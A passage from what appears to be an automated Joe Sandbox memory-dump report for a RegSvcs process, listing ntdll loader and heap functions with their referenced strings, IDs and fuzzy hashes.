                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014F327D
                                                                          • HEAP: , xrefs: 014F3264
                                                                          • HEAP[%wZ]: , xrefs: 014F3255
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          • API String ID: 0-617086771
                                                                          • Opcode ID: 0b8351b1641b7c31d07013eda1dccab3e1cc554234fe646f109232ab097dcfae
                                                                          • Instruction ID: 1ed95d9340d206d01d92163dbf86c91a3331cbc32b0b12e786835d989fe311ee
                                                                          • Opcode Fuzzy Hash: 0b8351b1641b7c31d07013eda1dccab3e1cc554234fe646f109232ab097dcfae
                                                                          • Instruction Fuzzy Hash: 9492BF71A042499FEB25CF68C444BAEBBF1FF48310F14805EEA59AB3A1D774A946CF50
                                                                          Function 014F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          • Opcode ID: 16353454d319fbee58d54ea98bd79ab1b9370596b966e31b5782dfdaa136d516
                                                                          • Instruction ID: 61b5f44c195d2d39405760d2e7c265450cc01f6e56d2c2c792db0992742ad6fc
                                                                          • Opcode Fuzzy Hash: 16353454d319fbee58d54ea98bd79ab1b9370596b966e31b5782dfdaa136d516
                                                                          • Instruction Fuzzy Hash: DBF19E34600606DFEB25CF68C894B6AB7F6FF84304F14416EE6569B3A2E730E941CB91
                                                                          Function 01506962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          • API String ID: 0-1077428164
                                                                          • Opcode ID: 7c069ff6f250528eed0f2cd32a4c221a88b3ce05aaa88a8dda217a79906db4d3
                                                                          • Instruction ID: 0e571af81f7001dd4fcd570697a88f56d972a0b5b7a93828d40d7f571baf9683
                                                                          • Opcode Fuzzy Hash: 7c069ff6f250528eed0f2cd32a4c221a88b3ce05aaa88a8dda217a79906db4d3
                                                                          • Instruction Fuzzy Hash: 6DC27E716093419FE726CF69C841BABBBE5BFC8754F04892DE9C98B291D734E804CB52
                                                                          Function 014DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          • API String ID: 0-2779062949
                                                                          • Opcode ID: 84967d910c21209c19bcc77620785b52268ce28abea1e6e10d87ac54753addfb
                                                                          • Instruction ID: ef87e2189c4d0b718b83d5196ded50c6d5059c30b562043e9dc148526c2e4e12
                                                                          • Opcode Fuzzy Hash: 84967d910c21209c19bcc77620785b52268ce28abea1e6e10d87ac54753addfb
                                                                          • Instruction Fuzzy Hash: 68A16F769016299BDF31DF64CC88BAAB7B4FF84710F1001EAE909AB250D7359E84CF50
                                                                          Function 01500BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0154A121
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0154A10F
                                                                          • LdrpCheckModule, xrefs: 0154A117
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-161242083
                                                                          • Opcode ID: 7d5507c0b90392d604d988f023e73afcbb18d4db11a63b0660f6ba6199a4df13
                                                                          • Instruction ID: 133f7e27f5d0c63e4f33d39ad4d1b7b475c36359a3d5257ad335c29b83a84796
                                                                          • Opcode Fuzzy Hash: 7d5507c0b90392d604d988f023e73afcbb18d4db11a63b0660f6ba6199a4df13
                                                                          • Instruction Fuzzy Hash: 8071E071A00206DFDB26DFA8C985BBEB7F4FB84204F15442DE416EF291E734AA46CB50
                                                                          Function 014F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-1334570610
                                                                          • Opcode ID: e14c10e802ed0c6d7aa0c68ff41eeab3dd52cfd3f055cd26625034e39a1b8701
                                                                          • Instruction ID: b116be49735eb29ee7375bca33333cf2077121dca909c52c5e6e4988154f7adb
                                                                          • Opcode Fuzzy Hash: e14c10e802ed0c6d7aa0c68ff41eeab3dd52cfd3f055cd26625034e39a1b8701
                                                                          • Instruction Fuzzy Hash: 34618E706103069FDB29CF68C480B6ABBE2FF95708F14855EE5558F3A6D770E841CB91
                                                                          Function 0151C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015582E8
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 015582DE
                                                                          • Failed to reallocate the system dirs string !, xrefs: 015582D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1783798831
                                                                          • Opcode ID: 3c1f40aed2e8c06ba043ce658f63ef82de755ff98a3205c2510b16384db1005f
                                                                          • Instruction ID: c51854b6f899597f002f66d17423bbf107dd1fa784d173fd9aff9eb2116be88d
                                                                          • Opcode Fuzzy Hash: 3c1f40aed2e8c06ba043ce658f63ef82de755ff98a3205c2510b16384db1005f
                                                                          • Instruction Fuzzy Hash: FB41F071541302ABD732EB69D844B5B7BE8BB94750F02482EB954DF2A4E7B0D804CB91
                                                                          Function 0159C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • @, xrefs: 0159C1F1
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0159C1C5
                                                                          • PreferredUILanguages, xrefs: 0159C212
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          • Opcode ID: 3cc996319b217bf8d0d7590cf57205f3590e37852dc5fee88244b2dddc06ec2c
                                                                          • Instruction ID: a4eb8bd501f280be0e1895c9aa7264455815747484c6528a402e69c30f1fcbbe
                                                                          • Opcode Fuzzy Hash: 3cc996319b217bf8d0d7590cf57205f3590e37852dc5fee88244b2dddc06ec2c
                                                                          • Instruction Fuzzy Hash: BD417472D0021AABDF11DBD8C851BEEBBBCBB55700F1440AAE649AB290D7749A448B51
                                                                          Function 01574144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          • API String ID: 0-1373925480
                                                                          • Opcode ID: ef488061ec977fce94b9d8f2edcf526700cddf85946a6ff39f22433a6bc4a8e4
                                                                          • Instruction ID: 2d93b60f36e468ac11fc88ac97f05ca63f5f6c652b734498a1c5d800277c3d25
                                                                          • Opcode Fuzzy Hash: ef488061ec977fce94b9d8f2edcf526700cddf85946a6ff39f22433a6bc4a8e4
                                                                          • Instruction Fuzzy Hash: 87410232A006598FEB22DBA9E845BADBBF8FFA5340F14045ADA11EF791D7348901CB11
                                                                          Function 01564755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpCheckRedirection, xrefs: 0156488F
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01564888
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01564899
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-3154609507
                                                                          • Opcode ID: 016be0dcb421064257f1656a4490e22c5f38b034ce51e3ec679aa4da36bb90a3
                                                                          • Instruction ID: 81a7829b8efa5ff340c518ec31e72db68513c9ae8992303f6a3d629ca7b23780
                                                                          • Opcode Fuzzy Hash: 016be0dcb421064257f1656a4490e22c5f38b034ce51e3ec679aa4da36bb90a3
                                                                          • Instruction Fuzzy Hash: 9241D232A056519FCB21CE6CD940A6ABBECFF8A650B06065DED58DF351D730D801CBD1
                                                                          Function 014F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-2558761708
                                                                          • Opcode ID: a30ff5f4d82c8ab68250a763c7a043016738bfefe25f65bfcb1efc5d5bd0284c
                                                                          • Instruction ID: dc6dcea2c4e182c99d6f2941723ab65e9b48bf5af78321bd156b88fb46c6f266
                                                                          • Opcode Fuzzy Hash: a30ff5f4d82c8ab68250a763c7a043016738bfefe25f65bfcb1efc5d5bd0284c
                                                                          • Instruction Fuzzy Hash: 3011AE313251469FDA29DB198450B6AB3A5EB9161AF19815EF5068F362E730D841C750
                                                                          Function 015620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 015620F3
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01562104
                                                                          • LdrpInitializationFailure, xrefs: 015620FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          • Opcode ID: 74325f4d4a4754cd8c56c59bac55bc62248ba6d77adfe71ce5f9343e1cf02734
                                                                          • Instruction ID: 8c6ae2f520896c8947c24b4d941d1f9dad7652b6781870510c9d47312c05135e
                                                                          • Opcode Fuzzy Hash: 74325f4d4a4754cd8c56c59bac55bc62248ba6d77adfe71ce5f9343e1cf02734
                                                                          • Instruction Fuzzy Hash: F4F0A475641209ABE724D64DCC46F9A376CFB40B54F61005EFA006F291D2F0AA04DB91
                                                                          Function 014F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          • API String ID: 48624451-232158463
                                                                          • Opcode ID: e5abea7fa3f32a53dcd456d6ed559e1baf8bb208e1df1a1c2c7a9aa5b8a00b80
                                                                          • Instruction ID: 44f47b03512c04ee6ca99eb2d58f3529af134a1ab293bf79e153968023e8ef80
                                                                          • Opcode Fuzzy Hash: e5abea7fa3f32a53dcd456d6ed559e1baf8bb208e1df1a1c2c7a9aa5b8a00b80
                                                                          • Instruction Fuzzy Hash: 29712C71A0014A9FDB05DF99C990BAEB7F8FF58704F154069E905EB391EA34E901CB61
                                                                          Function 014EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrResSearchResource Enter, xrefs: 014EAA13
                                                                          • LdrResSearchResource Exit, xrefs: 014EAA25
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          • API String ID: 0-4066393604
                                                                          • Opcode ID: 54e3bb5b46d3c787aab84dc992454bf8f0c03083c77fa599cfd8faf04e84fb23
                                                                          • Instruction ID: a1361a71b9017b12f6c34cf13dec2b68cb1161fba7c595fe3c67ae77f775a475
                                                                          • Opcode Fuzzy Hash: 54e3bb5b46d3c787aab84dc992454bf8f0c03083c77fa599cfd8faf04e84fb23
                                                                          • Instruction Fuzzy Hash: 86E1A371E00219AFEF21CF99D988BAEBBF9BF54314F204526FA11EB261D7349941CB50
                                                                          Function 015AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction ID: 2bc48e17b5aa2bff29777990a36ff51ae5f37f8703bb02fb7655f825592835c0
                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction Fuzzy Hash: A8C1AE312443429BEB25CE28C841B6FBBE5BFD4318F584A2DF6968F290D774D505CB91
                                                                          Function 0155E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          • Opcode ID: 9f820863dd075dd5b62045ed928e175b5cc674bcf133cabbf4e1afa2d706a6e9
                                                                          • Instruction ID: be6de43486a8b94e43e914459f7d2b731eff1cbd6e9b5bf8f4d13fdd886952af
                                                                          • Opcode Fuzzy Hash: 9f820863dd075dd5b62045ed928e175b5cc674bcf133cabbf4e1afa2d706a6e9
                                                                          • Instruction Fuzzy Hash: CC615B72E006199FDB54DFA88951BAEFBF5FB48700F14446EEA49EF291D731AA00CB50
                                                                          Function 015843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          • Opcode ID: ad6546488c8995f83b1692ae015cc1329ee6f77453593c9222e5612b060acdb2
                                                                          • Instruction ID: 96714758dcaeded67b33e35941b9f0b18597d6568190bdea5b019b6c93eb4c18
                                                                          • Opcode Fuzzy Hash: ad6546488c8995f83b1692ae015cc1329ee6f77453593c9222e5612b060acdb2
                                                                          • Instruction Fuzzy Hash: D251E871E0061EAFDF11DFA9CC90BEEBBB9FB54754F10452AEA11BB290D6309905CB60
                                                                          Function 014E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • kLsE, xrefs: 014E0540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014E063D
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 0-2547482624
                                                                          • Opcode ID: 4ef2b0fe7ef38eb7f797605b9d7d8891c27062607f04e9e406039f24e3a4f106
                                                                          • Instruction ID: 42e38d0e8236b1c5a1ad85e871c93955ce05208f8ccddb5ac4db7f8641e6506f
                                                                          • Opcode Fuzzy Hash: 4ef2b0fe7ef38eb7f797605b9d7d8891c27062607f04e9e406039f24e3a4f106
                                                                          • Instruction Fuzzy Hash: 9451AC716007428BD724EF78C4887A3BBE4AF84301F10483EE6AA87261E7B0D545CFA2
                                                                          Function 014EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 014EA2FB
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 014EA309
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          • API String ID: 0-2876891731
                                                                          • Opcode ID: 3d2e2251105d2e9c7a032cc5401a33abaad7435b4b2e64b482b416bae045333a
                                                                          • Instruction ID: 672d20d901b2a7ee72df8a93c579e7b13a816dcd6b9c68f205c36113827282ac
                                                                          • Opcode Fuzzy Hash: 3d2e2251105d2e9c7a032cc5401a33abaad7435b4b2e64b482b416bae045333a
                                                                          • Instruction Fuzzy Hash: 3F41BC30A00655CBEB11CF69D848B6EBBF4FF94305F2440AAE914DB3A1E2B5D941CB50
                                                                          Function 0151A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          • API String ID: 2994545307-4008356553
                                                                          • Opcode ID: 5089e4170925fdc7052875e2e281afb34a20ccf34477c5eb6b29d28281b67926
                                                                          • Instruction ID: 15e4b103ed88e57366906274d728553dcb339e51a281dfd301d746a5645e50f6
                                                                          • Opcode Fuzzy Hash: 5089e4170925fdc7052875e2e281afb34a20ccf34477c5eb6b29d28281b67926
                                                                          • Instruction Fuzzy Hash: E20121B2605740AFE322CF24CD45B1677E8F780725F018839E219CF190E330E804CB46
                                                                          Function 014EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          • Opcode ID: 79d8e468e00d3e5475198034e5fe619268c2ecba8aed604969f350275432855b
                                                                          • Instruction ID: 63ae899321b9e9e10594b145392ab0add3606db3757bf3d9e45e5d129dd238d0
                                                                          • Opcode Fuzzy Hash: 79d8e468e00d3e5475198034e5fe619268c2ecba8aed604969f350275432855b
                                                                          • Instruction Fuzzy Hash: FA826E75E002199FEF24CFA9C988BEEBBF1BF48311F14816AD959AB361D7309941CB50
                                                                          Function 01566420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 11be20fbb0d7592d397a16b708dd2baa881afffebaa95b340d42f3d301e054cf
                                                                          • Instruction ID: b0ec37e0692bb3900c66e6afbf0e0f5d0e9d0f5c1d1d61e207ce5bdcc53e9c03
                                                                          • Opcode Fuzzy Hash: 11be20fbb0d7592d397a16b708dd2baa881afffebaa95b340d42f3d301e054cf
                                                                          • Instruction Fuzzy Hash: 56914E7290061AAFEB21DF95DD85FAEBBB8FF58750F100069E600AF190D774AD00CBA0
                                                                          Function 0158E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: e909e1ef775d10cc6e24efef4baa83fcfb4a2fcc67c4a7a051180ec9765be0f1
                                                                          • Instruction ID: beb10f02d76d0b9d668cee389a803d2c8580c0d3558bacebfc3aefdddeaeb53e
                                                                          • Opcode Fuzzy Hash: e909e1ef775d10cc6e24efef4baa83fcfb4a2fcc67c4a7a051180ec9765be0f1
                                                                          • Instruction Fuzzy Hash: 53918F3290165ABEDB22AFA5DC45FAFBBB9FF95750F100029F501BB260DB74A901CB50
                                                                          Function 0151A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalTags
                                                                          • API String ID: 0-1106856819
                                                                          • Opcode ID: 1cdb3d37ffc29e4cbe611eef78d1bd06355fee67645399fb4110f7799ff8fe45
                                                                          • Instruction ID: 247959c751d823397fdbae232410dbdbe26741399edb25ddd69d53e05326b81b
                                                                          • Opcode Fuzzy Hash: 1cdb3d37ffc29e4cbe611eef78d1bd06355fee67645399fb4110f7799ff8fe45
                                                                          • Instruction Fuzzy Hash: EC718DB5E0024A9FDF69CF9CC4A06ADBBF1BF88710F54852EE905AF241E7308941CB60
                                                                          Function 01584978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .mui
                                                                          • API String ID: 0-1199573805
                                                                          • Opcode ID: ff2a41216d6ecac3a35c0391bf8609544b78e5655fa83211603d2a2f3ada4c71
                                                                          • Instruction ID: 1644a0afd5c9fd345f89ae7270d090727c1d30bd6a8033f64a30d55278d559a2
                                                                          • Opcode Fuzzy Hash: ff2a41216d6ecac3a35c0391bf8609544b78e5655fa83211603d2a2f3ada4c71
                                                                          • Instruction Fuzzy Hash: DF517C72D0022BDBDF11EF99D844BAEFAB5BF58A10F05412AEE15BF250D7749801CBA4
                                                                          Function 014FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: EXT-
                                                                          • API String ID: 0-1948896318
                                                                          • Opcode ID: 61d65073c4b2d9adca7eae30af8d121e2a22081bee781a006712847e2c295ec6
                                                                          • Instruction ID: 5876435f2d0b6fe2c9c5366a92f2e071e99cff37e233e2081999ed4e2845082b
                                                                          • Opcode Fuzzy Hash: 61d65073c4b2d9adca7eae30af8d121e2a22081bee781a006712847e2c295ec6
                                                                          • Instruction Fuzzy Hash: 4741A1725083529BD710DA75C880B6FB7E8AF98615F05092FF784EB3B0E674D904C792
                                                                          Function 0155C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryHash
                                                                          • API String ID: 0-2202222882
                                                                          • Opcode ID: d441ba5c6064aa653d0df58f883d6dbfe35ba204930618456ebdcd98279e5e8a
                                                                          • Instruction ID: 727c67da38e2d5b63d651de912db03f47b8e10022a571c8bca2e82c078b2cbca
                                                                          • Opcode Fuzzy Hash: d441ba5c6064aa653d0df58f883d6dbfe35ba204930618456ebdcd98279e5e8a
